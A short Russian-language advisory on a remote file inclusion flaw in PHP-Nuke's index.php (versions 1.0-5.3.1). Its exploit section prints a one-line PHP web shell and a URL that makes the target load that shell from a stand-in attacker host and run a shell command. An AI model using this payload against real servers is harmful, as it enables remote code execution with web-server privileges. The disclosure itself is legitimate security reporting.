Сценарий 'index.php' в PHP-Nuke имеет особенность, которая позволяет пользователям
подключать файлы. Из-за неправильной проверки ввода, возможно
включение файлов, расположенных на самом сервере. Может быть выполнен произвольный код во включенном файле.
Команды будут выполнены с привилегиями web сервера, в результате чего нападающий может получить досуп
к серверу. 

Уязвимость найдена в Francisco Burzi PHP-Nuke 1.0-5.3.1

Эксплоит

Создайте следующий файл на удаленном сервере:

<?php 
system($cmd); 
?>

Для выполнения команды la -la, запустите следующий URL

http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии